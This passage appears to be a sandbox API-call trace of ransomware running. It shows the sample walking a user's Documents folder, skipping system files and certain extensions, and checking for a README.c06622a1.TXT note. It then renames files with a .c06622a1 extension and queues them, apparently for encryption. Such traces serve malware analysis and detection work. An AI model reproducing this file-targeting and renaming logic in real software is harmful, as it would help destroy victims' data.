(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gfpSs.xls", dwFileAttributes=0x80) returned 1 [0149.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gfpSs.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\gfpss.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0149.512] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.512] ReadFile (in: hFile=0xd8, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.513] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xd5103776 [0149.513] RtlComputeCrc32 (PartialCrc=0x3776, Buffer=0x3fe674, Length=0x80) returned 0x307c7fe4 [0149.513] RtlComputeCrc32 (PartialCrc=0x7fe4, Buffer=0x3fe674, Length=0x80) returned 0xc5ca8a7b [0149.513] RtlComputeCrc32 (PartialCrc=0x8a7b, Buffer=0x3fe674, Length=0x80) returned 0x30091271 [0149.513] RtlComputeCrc32 (PartialCrc=0x1271, Buffer=0x3fe674, Length=0x80) returned 0x7fcf91b1 [0149.513] CloseHandle (hObject=0xd8) returned 1 [0149.513] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.513] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gfpSs.xls" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gfpSs.xls") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gfpSs.xls" [0149.513] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gfpSs.xls") returned 0x4e [0149.513] wcscpy (in: _Dest=0x454014c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.513] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gfpSs.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\gfpss.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gfpSs.xls.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\gfpss.xls.c06622a1"), dwFlags=0x8) returned 1 [0149.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\gfpSs.xls.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\gfpss.xls.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0xd8 [0149.517] CreateIoCompletionPort (FileHandle=0xd8, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.517] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4f70020 [0149.525] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xfa30313 [0149.525] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a855a99 [0149.525] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5ecfbf65 [0149.525] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3cd7858f [0149.525] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3ea18ede [0149.525] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5d80dd6f [0149.525] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x122416ec [0149.526] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x710d01d3 [0149.529] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4f70094, Length=0x80) returned 0x2efee534 [0149.529] RtlComputeCrc32 (PartialCrc=0xe534, Buffer=0x4f70094, Length=0x80) returned 0xc05d3b0c [0149.529] RtlComputeCrc32 (PartialCrc=0x3b0c, Buffer=0x4f70094, Length=0x80) returned 0xd1909f05 [0149.530] RtlComputeCrc32 (PartialCrc=0x9f05, Buffer=0x4f70094, Length=0x80) returned 0x5e481f42 [0149.530] RtlComputeCrc32 (PartialCrc=0x1f42, Buffer=0x4f70094, Length=0x80) returned 0x7a794e24 [0149.530] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4f70020) returned 1 [0149.530] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.530] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.530] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e6dd040, ftCreationTime.dwHighDateTime=0x1d5ddb7, ftLastAccessTime.dwLowDateTime=0x5ccf0190, ftLastAccessTime.dwHighDateTime=0x1d5df22, ftLastWriteTime.dwLowDateTime=0x5ccf0190, ftLastWriteTime.dwHighDateTime=0x1d5df22, nFileSizeHigh=0x0, nFileSizeLow=0x134a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ow2Zq2Z A3h_Hs.pps", cAlternateFileName="OW2ZQ2~1.PPS")) returned 1 [0149.530] _wcsicmp (_Str1="ow2Zq2Z A3h_Hs.pps", _Str2="README.c06622a1.TXT") returned -3 [0149.530] wcsstr (_Str="ow2Zq2Z A3h_Hs.pps", _SubStr="README") returned 0x0 [0149.530] _wcsicmp (_Str1="autorun.inf", _Str2="ow2Zq2Z A3h_Hs.pps") returned -14 [0149.530] wcslen (_String="autorun.inf") returned 0xb [0149.530] _wcsicmp (_Str1="boot.ini", _Str2="ow2Zq2Z A3h_Hs.pps") returned -13 [0149.530] wcslen (_String="boot.ini") returned 0x8 [0149.530] _wcsicmp (_Str1="bootfont.bin", _Str2="ow2Zq2Z A3h_Hs.pps") returned -13 [0149.530] wcslen (_String="bootfont.bin") returned 0xc [0149.530] _wcsicmp (_Str1="bootsect.bak", _Str2="ow2Zq2Z A3h_Hs.pps") returned -13 [0149.530] wcslen (_String="bootsect.bak") returned 0xc [0149.530] _wcsicmp (_Str1="desktop.ini", _Str2="ow2Zq2Z A3h_Hs.pps") returned -11 [0149.530] wcslen (_String="desktop.ini") returned 0xb [0149.531] _wcsicmp (_Str1="iconcache.db", _Str2="ow2Zq2Z A3h_Hs.pps") returned -6 [0149.531] wcslen (_String="iconcache.db") returned 0xc [0149.531] _wcsicmp (_Str1="ntldr", _Str2="ow2Zq2Z A3h_Hs.pps") returned -1 [0149.531] wcslen (_String="ntldr") returned 0x5 [0149.531] _wcsicmp (_Str1="ntuser.dat", _Str2="ow2Zq2Z A3h_Hs.pps") returned -1 [0149.531] wcslen (_String="ntuser.dat") returned 0xa [0149.531] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ow2Zq2Z A3h_Hs.pps") returned -1 [0149.531] wcslen (_String="ntuser.dat.log") returned 0xe [0149.531] _wcsicmp (_Str1="ntuser.ini", _Str2="ow2Zq2Z A3h_Hs.pps") returned -1 [0149.531] wcslen (_String="ntuser.ini") returned 0xa [0149.531] _wcsicmp (_Str1="thumbs.db", _Str2="ow2Zq2Z A3h_Hs.pps") returned 5 [0149.531] wcslen (_String="thumbs.db") returned 0x9 [0149.531] _wcsicmp (_Str1="386", _Str2="pps") returned -61 [0149.531] wcslen (_String="386") returned 0x3 [0149.531] _wcsicmp (_Str1="adv", _Str2="pps") returned -15 [0149.531] wcslen (_String="adv") returned 0x3 [0149.531] _wcsicmp (_Str1="ani", _Str2="pps") returned -15 [0149.531] wcslen (_String="ani") returned 0x3 [0149.531] _wcsicmp (_Str1="bat", _Str2="pps") returned -14 [0149.531] wcslen (_String="bat") returned 0x3 [0149.532] _wcsicmp (_Str1="bin", _Str2="pps") returned -14 [0149.532] wcslen (_String="bin") returned 0x3 [0149.532] _wcsicmp (_Str1="cab", _Str2="pps") returned -13 [0149.532] wcslen (_String="cab") returned 0x3 [0149.532] _wcsicmp (_Str1="cmd", _Str2="pps") returned -13 [0149.532] wcslen (_String="cmd") returned 0x3 [0149.532] _wcsicmp (_Str1="com", _Str2="pps") returned -13 [0149.532] wcslen (_String="com") returned 0x3 [0149.532] _wcsicmp (_Str1="cpl", _Str2="pps") returned -13 [0149.532] wcslen (_String="cpl") returned 0x3 [0149.532] _wcsicmp (_Str1="cur", _Str2="pps") returned -13 [0149.532] wcslen (_String="cur") returned 0x3 [0149.532] _wcsicmp (_Str1="deskthemepack", _Str2="pps") returned -12 [0149.532] wcslen (_String="deskthemepack") returned 0xd [0149.532] _wcsicmp (_Str1="diagcab", _Str2="pps") returned -12 [0149.532] wcslen (_String="diagcab") returned 0x7 [0149.532] _wcsicmp (_Str1="diagcfg", _Str2="pps") returned -12 [0149.532] wcslen (_String="diagcfg") returned 0x7 [0149.532] _wcsicmp (_Str1="diagpkg", _Str2="pps") returned -12 [0149.532] wcslen (_String="diagpkg") returned 0x7 [0149.532] _wcsicmp (_Str1="dll", _Str2="pps") returned -12 [0149.533] wcslen (_String="dll") returned 0x3 [0149.533] _wcsicmp (_Str1="drv", _Str2="pps") returned -12 [0149.533] wcslen (_String="drv") returned 0x3 [0149.533] _wcsicmp (_Str1="exe", _Str2="pps") returned -11 [0149.533] wcslen (_String="exe") returned 0x3 [0149.533] _wcsicmp (_Str1="hlp", _Str2="pps") returned -8 [0149.533] wcslen (_String="hlp") returned 0x3 [0149.533] _wcsicmp (_Str1="icl", _Str2="pps") returned -7 [0149.533] wcslen (_String="icl") returned 0x3 [0149.533] _wcsicmp (_Str1="icns", _Str2="pps") returned -7 [0149.533] wcslen (_String="icns") returned 0x4 [0149.533] _wcsicmp (_Str1="ico", _Str2="pps") returned -7 [0149.533] wcslen (_String="ico") returned 0x3 [0149.533] _wcsicmp (_Str1="ics", _Str2="pps") returned -7 [0149.533] wcslen (_String="ics") returned 0x3 [0149.533] _wcsicmp (_Str1="idx", _Str2="pps") returned -7 [0149.533] wcslen (_String="idx") returned 0x3 [0149.533] _wcsicmp (_Str1="ldf", _Str2="pps") returned -4 [0149.533] wcslen (_String="ldf") returned 0x3 [0149.533] _wcsicmp (_Str1="lnk", _Str2="pps") returned -4 [0149.533] wcslen (_String="lnk") returned 0x3 [0149.533] _wcsicmp (_Str1="mod", _Str2="pps") returned -3 [0149.534] wcslen (_String="mod") returned 0x3 [0149.534] _wcsicmp (_Str1="mpa", _Str2="pps") returned -3 [0149.534] wcslen (_String="mpa") returned 0x3 [0149.534] _wcsicmp (_Str1="msc", _Str2="pps") returned -3 [0149.534] wcslen (_String="msc") returned 0x3 [0149.534] _wcsicmp (_Str1="msp", _Str2="pps") returned -3 [0149.534] wcslen (_String="msp") returned 0x3 [0149.534] _wcsicmp (_Str1="msstyles", _Str2="pps") returned -3 [0149.534] wcslen (_String="msstyles") returned 0x8 [0149.534] _wcsicmp (_Str1="msu", _Str2="pps") returned -3 [0149.534] wcslen (_String="msu") returned 0x3 [0149.534] _wcsicmp (_Str1="nls", _Str2="pps") returned -2 [0149.534] wcslen (_String="nls") returned 0x3 [0149.534] _wcsicmp (_Str1="nomedia", _Str2="pps") returned -2 [0149.534] wcslen (_String="nomedia") returned 0x7 [0149.534] _wcsicmp (_Str1="ocx", _Str2="pps") returned -1 [0149.534] wcslen (_String="ocx") returned 0x3 [0149.534] _wcsicmp (_Str1="prf", _Str2="pps") returned 2 [0149.534] wcslen (_String="prf") returned 0x3 [0149.534] _wcsicmp (_Str1="ps1", _Str2="pps") returned 3 [0149.534] wcslen (_String="ps1") returned 0x3 [0149.535] _wcsicmp (_Str1="rom", _Str2="pps") returned 2 [0149.535] wcslen (_String="rom") returned 0x3 [0149.535] _wcsicmp (_Str1="rtp", _Str2="pps") returned 2 [0149.535] wcslen (_String="rtp") returned 0x3 [0149.535] _wcsicmp (_Str1="scr", _Str2="pps") returned 3 [0149.535] wcslen (_String="scr") returned 0x3 [0149.535] _wcsicmp (_Str1="shs", _Str2="pps") returned 3 [0149.535] wcslen (_String="shs") returned 0x3 [0149.535] _wcsicmp (_Str1="spl", _Str2="pps") returned 3 [0149.535] wcslen (_String="spl") returned 0x3 [0149.535] _wcsicmp (_Str1="sys", _Str2="pps") returned 3 [0149.535] wcslen (_String="sys") returned 0x3 [0149.535] _wcsicmp (_Str1="theme", _Str2="pps") returned 4 [0149.535] wcslen (_String="theme") returned 0x5 [0149.535] _wcsicmp (_Str1="themepack", _Str2="pps") returned 4 [0149.535] wcslen (_String="themepack") returned 0x9 [0149.535] _wcsicmp (_Str1="wpx", _Str2="pps") returned 7 [0149.535] wcslen (_String="wpx") returned 0x3 [0149.535] _wcsicmp (_Str1="lock", _Str2="pps") returned -4 [0149.535] wcslen (_String="lock") returned 0x4 [0149.535] _wcsicmp (_Str1="key", _Str2="pps") returned -5 [0149.536] wcslen (_String="key") returned 0x3 [0149.536] _wcsicmp (_Str1="hta", _Str2="pps") returned -8 [0149.536] wcslen (_String="hta") returned 0x3 [0149.536] _wcsicmp (_Str1="msi", _Str2="pps") returned -3 [0149.536] wcslen (_String="msi") returned 0x3 [0149.536] _wcsicmp (_Str1="pdb", _Str2="pps") returned -12 [0149.536] wcslen (_String="pdb") returned 0x3 [0149.536] _wcsicmp (_Str1="sql", _Str2="pps") returned 3 [0149.536] wcslen (_String="sql") returned 0x3 [0149.536] _wcsicmp (_Str1="sqlite", _Str2="pps") returned 3 [0149.536] wcslen (_String="sqlite") returned 0x6 [0149.536] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow")) returned 0x10 [0149.536] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.536] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" [0149.536] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW") returned 0x44 [0149.536] wcscpy (in: _Dest=0x4530132, _Source="ow2Zq2Z A3h_Hs.pps" | out: _Dest="ow2Zq2Z A3h_Hs.pps") returned="ow2Zq2Z A3h_Hs.pps" [0149.536] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\ow2Zq2Z A3h_Hs.pps", dwFileAttributes=0x80) returned 1 [0149.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\ow2Zq2Z A3h_Hs.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\ow2zq2z a3h_hs.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0 [0149.537] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.537] ReadFile (in: hFile=0x2e0, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.538] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x65bbb91e [0149.538] RtlComputeCrc32 (PartialCrc=0xb91e, Buffer=0x3fe674, Length=0x80) returned 0x9d1b7d1a [0149.538] RtlComputeCrc32 (PartialCrc=0x7d1a, Buffer=0x3fe674, Length=0x80) returned 0x8eb516b [0149.538] RtlComputeCrc32 (PartialCrc=0x516b, Buffer=0x3fe674, Length=0x80) returned 0x291b6511 [0149.538] RtlComputeCrc32 (PartialCrc=0x6511, Buffer=0x3fe674, Length=0x80) returned 0x52832b98 [0149.538] CloseHandle (hObject=0x2e0) returned 1 [0149.538] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.538] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\ow2Zq2Z A3h_Hs.pps" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\ow2Zq2Z A3h_Hs.pps") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\ow2Zq2Z A3h_Hs.pps" [0149.539] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\ow2Zq2Z A3h_Hs.pps") returned 0x57 [0149.539] wcscpy (in: _Dest=0x454015e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.539] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\ow2Zq2Z A3h_Hs.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\ow2zq2z a3h_hs.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\ow2Zq2Z A3h_Hs.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\ow2zq2z a3h_hs.pps.c06622a1"), dwFlags=0x8) returned 1 [0149.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\ow2Zq2Z A3h_Hs.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\ow2zq2z a3h_hs.pps.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x2e0 [0149.541] CreateIoCompletionPort (FileHandle=0x2e0, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.541] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x5000020 [0149.550] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3b0beed4 [0149.550] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a742f57 [0149.550] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7832b4db [0149.550] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x776a6b4f [0149.550] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6ea22686 [0149.550] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1ea9e5a [0149.550] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x796530c5 [0149.550] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2bf79b2c [0149.555] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x5000094, Length=0x80) returned 0x921b9256 [0149.555] RtlComputeCrc32 (PartialCrc=0x9256, Buffer=0x5000094, Length=0x80) returned 0xccd3af92 [0149.555] RtlComputeCrc32 (PartialCrc=0xaf92, Buffer=0x5000094, Length=0x80) returned 0x151502a3 [0149.555] RtlComputeCrc32 (PartialCrc=0x2a3, Buffer=0x5000094, Length=0x80) returned 0x9b35190c [0149.555] RtlComputeCrc32 (PartialCrc=0x190c, Buffer=0x5000094, Length=0x80) returned 0x15820cd2 [0149.555] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5000020) returned 1 [0149.555] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.555] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.555] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8371a20, ftCreationTime.dwHighDateTime=0x1d5e80d, ftLastAccessTime.dwLowDateTime=0xbc8fbf10, ftLastAccessTime.dwHighDateTime=0x1d5da00, ftLastWriteTime.dwLowDateTime=0xbc8fbf10, ftLastWriteTime.dwHighDateTime=0x1d5da00, nFileSizeHigh=0x0, nFileSizeLow=0x14d93, dwReserved0=0x0, dwReserved1=0x0, cFileName="QY0nMDkwxi6m.ods", cAlternateFileName="QY0NMD~1.ODS")) returned 1 [0149.555] _wcsicmp (_Str1="QY0nMDkwxi6m.ods", _Str2="README.c06622a1.TXT") returned -1 [0149.555] wcsstr (_Str="QY0nMDkwxi6m.ods", _SubStr="README") returned 0x0 [0149.555] _wcsicmp (_Str1="autorun.inf", _Str2="QY0nMDkwxi6m.ods") returned -16 [0149.555] wcslen (_String="autorun.inf") returned 0xb [0149.555] _wcsicmp (_Str1="boot.ini", _Str2="QY0nMDkwxi6m.ods") returned -15 [0149.555] wcslen (_String="boot.ini") returned 0x8 [0149.555] _wcsicmp (_Str1="bootfont.bin", _Str2="QY0nMDkwxi6m.ods") returned -15 [0149.555] wcslen (_String="bootfont.bin") returned 0xc [0149.555] _wcsicmp (_Str1="bootsect.bak", _Str2="QY0nMDkwxi6m.ods") returned -15 [0149.555] wcslen (_String="bootsect.bak") returned 0xc [0149.556] _wcsicmp (_Str1="desktop.ini", _Str2="QY0nMDkwxi6m.ods") returned -13 [0149.556] wcslen (_String="desktop.ini") returned 0xb [0149.556] _wcsicmp (_Str1="iconcache.db", _Str2="QY0nMDkwxi6m.ods") returned -8 [0149.556] wcslen (_String="iconcache.db") returned 0xc [0149.556] _wcsicmp (_Str1="ntldr", _Str2="QY0nMDkwxi6m.ods") returned -3 [0149.556] wcslen (_String="ntldr") returned 0x5 [0149.556] _wcsicmp (_Str1="ntuser.dat", _Str2="QY0nMDkwxi6m.ods") returned -3 [0149.556] wcslen (_String="ntuser.dat") returned 0xa [0149.556] _wcsicmp (_Str1="ntuser.dat.log", _Str2="QY0nMDkwxi6m.ods") returned -3 [0149.556] wcslen (_String="ntuser.dat.log") returned 0xe [0149.556] _wcsicmp (_Str1="ntuser.ini", _Str2="QY0nMDkwxi6m.ods") returned -3 [0149.556] wcslen (_String="ntuser.ini") returned 0xa [0149.556] _wcsicmp (_Str1="thumbs.db", _Str2="QY0nMDkwxi6m.ods") returned 3 [0149.557] wcslen (_String="thumbs.db") returned 0x9 [0149.557] _wcsicmp (_Str1="386", _Str2="ods") returned -60 [0149.557] wcslen (_String="386") returned 0x3 [0149.557] _wcsicmp (_Str1="adv", _Str2="ods") returned -14 [0149.557] wcslen (_String="adv") returned 0x3 [0149.557] _wcsicmp (_Str1="ani", _Str2="ods") returned -14 [0149.557] wcslen (_String="ani") returned 0x3 [0149.557] _wcsicmp (_Str1="bat", _Str2="ods") returned -13 [0149.557] wcslen (_String="bat") returned 0x3 [0149.557] _wcsicmp (_Str1="bin", _Str2="ods") returned -13 [0149.557] wcslen (_String="bin") returned 0x3 [0149.557] _wcsicmp (_Str1="cab", _Str2="ods") returned -12 [0149.557] wcslen (_String="cab") returned 0x3 [0149.557] _wcsicmp (_Str1="cmd", _Str2="ods") returned -12 [0149.557] wcslen (_String="cmd") returned 0x3 [0149.557] _wcsicmp (_Str1="com", _Str2="ods") returned -12 [0149.557] wcslen (_String="com") returned 0x3 [0149.557] _wcsicmp (_Str1="cpl", _Str2="ods") returned -12 [0149.557] wcslen (_String="cpl") returned 0x3 [0149.557] _wcsicmp (_Str1="cur", _Str2="ods") returned -12 [0149.557] wcslen (_String="cur") returned 0x3 [0149.558] _wcsicmp (_Str1="deskthemepack", _Str2="ods") returned -11 [0149.558] wcslen (_String="deskthemepack") returned 0xd [0149.558] _wcsicmp (_Str1="diagcab", _Str2="ods") returned -11 [0149.558] wcslen (_String="diagcab") returned 0x7 [0149.558] _wcsicmp (_Str1="diagcfg", _Str2="ods") returned -11 [0149.558] wcslen (_String="diagcfg") returned 0x7 [0149.558] _wcsicmp (_Str1="diagpkg", _Str2="ods") returned -11 [0149.558] wcslen (_String="diagpkg") returned 0x7 [0149.558] _wcsicmp (_Str1="dll", _Str2="ods") returned -11 [0149.558] wcslen (_String="dll") returned 0x3 [0149.558] _wcsicmp (_Str1="drv", _Str2="ods") returned -11 [0149.558] wcslen (_String="drv") returned 0x3 [0149.558] _wcsicmp (_Str1="exe", _Str2="ods") returned -10 [0149.558] wcslen (_String="exe") returned 0x3 [0149.558] _wcsicmp (_Str1="hlp", _Str2="ods") returned -7 [0149.558] wcslen (_String="hlp") returned 0x3 [0149.558] _wcsicmp (_Str1="icl", _Str2="ods") returned -6 [0149.558] wcslen (_String="icl") returned 0x3 [0149.558] _wcsicmp (_Str1="icns", _Str2="ods") returned -6 [0149.558] wcslen (_String="icns") returned 0x4 [0149.558] _wcsicmp (_Str1="ico", _Str2="ods") returned -6 [0149.558] wcslen (_String="ico") returned 0x3 [0149.559] _wcsicmp (_Str1="ics", _Str2="ods") returned -6 [0149.559] wcslen (_String="ics") returned 0x3 [0149.559] _wcsicmp (_Str1="idx", _Str2="ods") returned -6 [0149.559] wcslen (_String="idx") returned 0x3 [0149.559] _wcsicmp (_Str1="ldf", _Str2="ods") returned -3 [0149.559] wcslen (_String="ldf") returned 0x3 [0149.559] _wcsicmp (_Str1="lnk", _Str2="ods") returned -3 [0149.559] wcslen (_String="lnk") returned 0x3 [0149.559] _wcsicmp (_Str1="mod", _Str2="ods") returned -2 [0149.559] wcslen (_String="mod") returned 0x3 [0149.559] _wcsicmp (_Str1="mpa", _Str2="ods") returned -2 [0149.559] wcslen (_String="mpa") returned 0x3 [0149.559] _wcsicmp (_Str1="msc", _Str2="ods") returned -2 [0149.559] wcslen (_String="msc") returned 0x3 [0149.559] _wcsicmp (_Str1="msp", _Str2="ods") returned -2 [0149.559] wcslen (_String="msp") returned 0x3 [0149.559] _wcsicmp (_Str1="msstyles", _Str2="ods") returned -2 [0149.559] wcslen (_String="msstyles") returned 0x8 [0149.559] _wcsicmp (_Str1="msu", _Str2="ods") returned -2 [0149.559] wcslen (_String="msu") returned 0x3 [0149.559] _wcsicmp (_Str1="nls", _Str2="ods") returned -1 [0149.560] wcslen (_String="nls") returned 0x3 [0149.560] _wcsicmp (_Str1="nomedia", _Str2="ods") returned -1 [0149.560] wcslen (_String="nomedia") returned 0x7 [0149.560] _wcsicmp (_Str1="ocx", _Str2="ods") returned -1 [0149.560] wcslen (_String="ocx") returned 0x3 [0149.560] _wcsicmp (_Str1="prf", _Str2="ods") returned 1 [0149.560] wcslen (_String="prf") returned 0x3 [0149.560] _wcsicmp (_Str1="ps1", _Str2="ods") returned 1 [0149.560] wcslen (_String="ps1") returned 0x3 [0149.560] _wcsicmp (_Str1="rom", _Str2="ods") returned 3 [0149.560] wcslen (_String="rom") returned 0x3 [0149.560] _wcsicmp (_Str1="rtp", _Str2="ods") returned 3 [0149.560] wcslen (_String="rtp") returned 0x3 